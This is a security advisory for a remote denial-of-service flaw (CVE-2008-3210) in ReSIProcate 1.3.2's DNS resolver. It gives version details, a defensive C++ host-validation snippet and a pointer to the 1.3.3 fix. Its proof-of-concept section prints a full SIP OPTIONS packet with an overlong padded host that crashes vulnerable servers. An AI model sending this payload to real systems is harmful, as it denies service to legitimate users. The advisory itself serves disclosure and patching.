ReSIProcate INVITE and OPTIONS Messages DNS Resolver Remote Denial of Service Vulnerability
BID:30194
Info
| Bugtraq ID: | 30194 |
| Class: | Boundary Condition Error |
| CVE: | CVE-2008-3210 |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 03 2008 12:00AM |
| Updated: | May 07 2015 05:27PM |
| Credit: | Mu Dynamics research team |
| Vulnerable: | ReSIProcate ReSIProcate 1.3.2 |
| Not Vulnerable: | ReSIProcate ReSIProcate 1.3.3 |
Discussion
ReSIProcate is prone to a remote denial-of-service vulnerability because it fails to perform adequate boundary checks when handling user-supplied URIs.
Attackers can leverage this issue to crash the application and deny service to legitimate users. Given the nature of this issue, remote code execution may also be possible, but this has not been confirmed.
Versions prior to ReSIProcate 1.3.3 are vulnerable.
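As an added illustration (not reSIProcate's code and not the vendor's 1.3.3 fix), the kind of boundary check described above can be applied to the Request-URI host before it is handed to a DNS resolver. The function names are hypothetical; the 63-octet label and 253-character name limits are the RFC 1035 limits, and IPv6 literals and case-insensitive schemes are left out to keep the example short.

```cpp
#include <cstddef>
#include <string>

// RFC 1035 limits for a host name in textual form.
constexpr std::size_t kMaxLabel = 63;
constexpr std::size_t kMaxName = 253;

// Extract the host part of the Request-URI from a SIP request line such as
// "OPTIONS sip:user@host:port;params SIP/2.0". Returns false if malformed.
// Assumption: lowercase sip/sips scheme, no bracketed IPv6 host.
bool requestUriHost(const std::string& line, std::string& host) {
    std::size_t sp1 = line.find(' ');
    std::size_t sp2 = line.rfind(' ');
    if (sp1 == std::string::npos || sp2 <= sp1) return false;
    std::string uri = line.substr(sp1 + 1, sp2 - sp1 - 1);
    std::size_t colon = uri.find(':');
    if (colon == std::string::npos) return false;
    std::string scheme = uri.substr(0, colon);
    if (scheme != "sip" && scheme != "sips") return false;
    std::string rest = uri.substr(colon + 1);
    std::size_t at = rest.find('@');  // userinfo is optional
    if (at != std::string::npos) rest = rest.substr(at + 1);
    host = rest.substr(0, rest.find_first_of(":;?"));  // drop port/params
    return !host.empty();
}

// True only if the host is within DNS length limits and contains nothing
// but hostname characters. A trailing dot is rejected as an empty label.
bool hostFitsDns(const std::string& host) {
    if (host.empty() || host.size() > kMaxName) return false;
    std::size_t labelLen = 0;
    for (char c : host) {
        if (c == '.') {
            if (labelLen == 0) return false;  // empty label
            labelLen = 0;
            continue;
        }
        bool ok = (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
                  (c >= '0' && c <= '9') || c == '-';
        if (!ok || ++labelLen > kMaxLabel) return false;
    }
    return labelLen > 0;
}

// Gate to run on the request line before any DNS lookup is attempted.
bool acceptRequestLine(const std::string& line) {
    std::string host;
    return requestUriHost(line, host) && hostFitsDns(host);
}
```

A request that fails this gate can be answered with an error response or dropped without the host ever reaching name resolution.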
Exploit / POC
The following example packet is available:
OPTIONS sip:bob@example.comAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA SIP/2.0
Via: SIP/2.0/UDP 127.0.0.1:54422;branch=z9hG4bKZqPsHMEiem;rport
To: "Bob" <sip:[email protected]>
From: "Alice" <sip:[email protected]>;tag=W4eHvLYEQX
Call-ID: [email protected]
CSeq: 1 OPTIONS
Contact: <sip:[email protected]:54422>
Max-Forwards: 70
Content-Length: 0
Solution / Fix
Solution:
The vendor has released ReSIProcate 1.3.3. Please see the references for more information.
ReSIProcate ReSIProcate 1.3.2
- ReSIProcate resiprocate-1.3.3.tar.gz
  https://www.resiprocate.org/files/pub/reSIProcate/releases/resiprocate-1.3.3.tar.gz
References
References:
- ReSIProcate 1.3.3 Release (ReSIProcate)
- Vendor Homepage (ReSIProcate)